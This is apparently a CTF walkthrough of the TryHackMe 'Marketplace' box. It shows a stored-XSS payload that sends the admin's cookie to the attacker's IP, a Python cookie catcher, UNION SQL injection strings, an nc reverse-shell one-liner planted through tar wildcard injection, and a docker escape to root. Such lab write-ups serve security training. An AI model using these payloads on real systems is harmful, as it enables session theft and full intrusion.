This is a medium-rated box from TryHackMe.
First we start with an nmap scan to find the open ports and identify the services behind them:
Command: nmap -sC -sV $IP
Only three ports are open, and two of them are web servers: port 80 and port 32768. Let's check port 80 first.
Before we do anything else, let's start a gobuster scan in the background:
Command: gobuster dir -u http://$IP -w /path/to/wordlist -x <extensions>
We can check robots.txt, but there is not much there, only an /admin directory, which gobuster also found. So it's time to dig into the website.
There appear to be two users, michael and jake, so we may find passwords for them later. I tried some basic SQL injection against the login form, but nothing worked, so the next thing I did was create an account.
After logging in with the newly created account there is not much we can do. After trying all sorts of things, the only "positive" result was an XSS injection in the "report listing to admins" functionality.
Command: <<SCRIPT>alert("XSS");//\<</SCRIPT>
After some more digging I saw that the website uses cookies for its sessions; combined with the report functionality, that can mean only one thing: cookie stealing.
Every time we report a listing, an admin visits that listing and sends us a message saying whether they found anything wrong with it. If the admin's browser executes a script stored in our listing, that script can send us the admin's cookie. Now let's test it.
First I used this script (you can do it manually too): https://github.com/tacticthreat/CookieHeist
I hosted the files with a Python web server: python -m http.server
Now create a new listing containing the following XSS payload:
Command: <script type="text/javascript">document.location="http://10.8.0.116/cookiesteal-simple.php?c=" + document.cookie + "&t=Alert";</script>
Then use the report functionality: report the first item on the list and intercept the request with Burp Suite.
Change the item number from 1 to the number of your XSS listing.
After you press the Report button, the Python server receives a request carrying a cookie, which is the admin's cookie.
Now open the developer tools (F12), replace the value of your session cookie with the admin's, refresh the page, and an administration panel should appear.
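The CookieHeist PHP script does the receiving side of this step. As an added example that is not part of the original walkthrough or of CookieHeist, here is a self-contained Python catcher with the same contract (the payload redirects the victim to `/steal?c=<document.cookie>`), plus a stand-in for the admin's browser so it can be exercised offline; the `/steal` path, the port and the sample cookie are all assumptions constructed for the demo.

```python
"""Minimal cookie catcher for the stored-XSS step (added example, not CookieHeist).

Assumptions: the stored payload sends GET /steal?c=<document.cookie> to this
listener; the host, port and the sample cookie below are constructed for the demo.
"""
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

CAPTURED = []  # (client_ip, cookie_string) pairs, appended as requests arrive


def extract_cookie(path):
    """Return the value of the c= query parameter of a request path, or None."""
    query = urllib.parse.urlparse(path).query
    values = urllib.parse.parse_qs(query).get("c")
    return values[0] if values else None


class CatcherHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        cookie = extract_cookie(self.path)
        if cookie is not None:
            CAPTURED.append((self.client_address[0], cookie))
        # Empty 200 reply: the victim's browser just sees a blank page.
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, fmt, *args):
        pass  # keep stderr quiet; CAPTURED is the record we care about


def start_catcher(port=0):
    """Start the listener in a daemon thread; port 0 lets the OS pick a free port."""
    server = HTTPServer(("127.0.0.1", port), CatcherHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def xss_payload(catcher_url):
    """Build the stored payload: redirect the viewer to the catcher with their cookie."""
    return ('<script>document.location="' + catcher_url +
            '?c=" + encodeURIComponent(document.cookie);</script>')


def simulate_victim(server, cookie):
    """Stand in for the admin's browser following the redirect; returns the HTTP status."""
    host, port = server.server_address
    url = f"http://{host}:{port}/steal?c={urllib.parse.quote(cookie)}"
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))  # ignore proxy env
    with opener.open(url, timeout=5) as resp:
        return resp.status


if __name__ == "__main__":
    srv = start_catcher()
    host, port = srv.server_address
    print("store this in the listing:", xss_payload(f"http://{host}:{port}/steal"))
    simulate_victim(srv, "token=constructed.admin.session")  # constructed sample cookie
    print("captured:", CAPTURED)
    srv.shutdown()
```

Run it as-is to see the payload it would store and the cookie it captures; against a real target you would bind to the VPN interface instead of 127.0.0.1 and point `xss_payload` at that address.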
After this I was stuck again for a while. The admin who visited the reported listing was michael; I tried switching to the other admin, jake, but no luck. I even tried sqlmap against the ?user=1 parameter, again with no luck. How about manual SQL injection?
If we put a ' (single quote) in the ?user=1 parameter we get a database error, as in the image below.
ORDER BY n sorts the result by the n-th selected column, so it only succeeds while n is not larger than the number of columns the query selects. From the screenshot, ORDER BY 5 gives an error while ORDER BY 4 does not, which means the query returns 4 columns.
Now pass an input that matches no row by replacing user=1 with user=-1; the page should render without any user data, like this:
Let's see if we can do a UNION injection. UNION appends the rows of our own SELECT to the result of the original query; since user=-1 matches nothing, the only row the page renders is ours, and our SELECT must have the same 4 columns.
Using this method, let's retrieve the database names.
Command: -1 union select (select group_concat(SCHEMA_NAME) from INFORMATION_SCHEMA.SCHEMATA),2,3,4-- -
Now that we know the database name, we can retrieve its tables.
Command: -1 union select (select group_concat(TABLE_NAME) from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA = 'marketplace'),2,3,4-- -
And finally we can get the columns.
Command: -1 union select (select group_concat(TABLE_NAME, COLUMN_NAME, "\n" SEPARATOR ':') from INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA = 'marketplace'),2,3,4-- -
I managed to dump some password hashes, but I wasn't able to crack them, so I kept looking and found something interesting in the messages table:
Command: http://10.10.10.61/admin?user=-1%20union%20select%20(select%20group_concat(message_content,%20%22\n%22%20SEPARATOR%20%27:%27)%20from%20marketplace.messages),2,3,4--%20-
Decoded: ?user=-1 union select (select group_concat(message_content, "\n" SEPARATOR ':') from marketplace.messages),2,3,4-- -
It looks like the message contains a password, and it belongs to user jake, so we can get a shell on the box over SSH. The first thing I always do is check the user's sudo privileges with sudo -l.
Looks like we can execute backup.sh as user michael. Here is the content of that file:
The trick below relies on backup.sh archiving a directory we can write to with tar and a shell wildcard: the wildcard expands our filenames into tar's arguments, tar treats the ones starting with -- as options, and the checkpoint action runs shell.sh, which connects back to our listener (start one first with nc -lvnp 1337). Create the files in that directory and then run backup.sh with sudo -u michael.
Commands:
- echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.0.116 1337 >/tmp/f" > shell.sh
- echo "" > "--checkpoint-action=exec=sh shell.sh"
- echo "" > --checkpoint=1
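To see why those three files give a shell without needing the box, here is an added example (not the box's backup.sh, which the page only shows as an image): it assumes, as the planted filenames do, that the script runs `tar cf backup.tar *` in a writable directory, recreates that with a constructed stand-in in a temporary directory, replaces the reverse shell with a marker file, and shows that ending option parsing with `--` stops the payload from running. It needs GNU tar, which is what the box has.

```python
"""Why the three echo commands hand us a shell as michael.

Added example, not the box's backup.sh (the page shows that script only as an
image). Assumption, which is what the planted filenames rely on: backup.sh runs
tar over a shell wildcard in a directory we can write to. A constructed
stand-in does `tar cf backup.tar *`, and the payload here writes a marker
file instead of spawning a reverse shell. Needs GNU tar, as on the box.
"""
import os
import subprocess
import tempfile


def plant_checkpoint_files(workdir, payload_cmd):
    """The walkthrough's three files: the payload, and two filenames that tar
    will parse as options once the wildcard expands them into its arguments."""
    for name, body in (("shell.sh", payload_cmd + "\n"),
                       ("--checkpoint-action=exec=sh shell.sh", ""),
                       ("--checkpoint=1", "")):
        with open(os.path.join(workdir, name), "w") as fh:
            fh.write(body)


def run_backup(workdir, hardened=False):
    """Stand-in for backup.sh. The hardened variant ends option parsing with --,
    so the planted names are archived as ordinary members and nothing executes."""
    tar = "tar cf backup.tar -- *" if hardened else "tar cf backup.tar *"
    return subprocess.run(["sh", "-c", f"cd '{workdir}' && {tar}"],
                          capture_output=True, text=True, check=False)


def wildcard_injection_fires(hardened=False):
    """Return True if tar's checkpoint action actually ran the planted payload."""
    with tempfile.TemporaryDirectory() as workdir:
        marker = os.path.join(workdir, "marker")
        plant_checkpoint_files(workdir, f"id > '{marker}'")
        run_backup(workdir, hardened=hardened)
        return os.path.exists(marker)


if __name__ == "__main__":
    print("vulnerable backup ran payload:", wildcard_injection_fires())
    print("hardened backup ran payload:", wildcard_injection_fires(hardened=True))
```

The same check is worth running before you plant files on a real target: if the script uses `--` or `./*` instead of a bare `*`, the checkpoint files are just archived and you need a different route.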
Now that we have a shell as user michael, we can check which groups we are in (id).
One group that stands out is docker: its members can start containers that mount the host filesystem, which is as good as root.
Before running the command that gives us a root shell, let's check which images are available locally.
Command: docker images
Using the command below I got root: it mounts the host's / at /mnt inside an alpine container and chroots into it, so the shell runs as root over the host filesystem.
Command: docker run -v /:/mnt --rm -it alpine chroot /mnt sh